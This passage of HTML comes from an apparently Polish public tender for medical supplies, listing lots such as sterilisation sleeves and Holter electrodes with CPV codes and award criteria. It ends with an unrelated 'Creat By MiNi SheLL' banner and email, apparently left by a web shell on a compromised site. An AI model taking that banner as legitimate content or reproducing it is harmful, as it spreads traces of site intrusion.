Rękaw papierowo-foliowy duży 200x200	rol.	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 19.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Jakość wyrobu - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Elektrody do Holtera.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Elektrody do Holtera ze stałym żelem , sensor Ag/AgCl  pakowane w woreczki po 30 szt. lub kartony zbiorcze po 1200 szt. 	szt. 	3 600.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com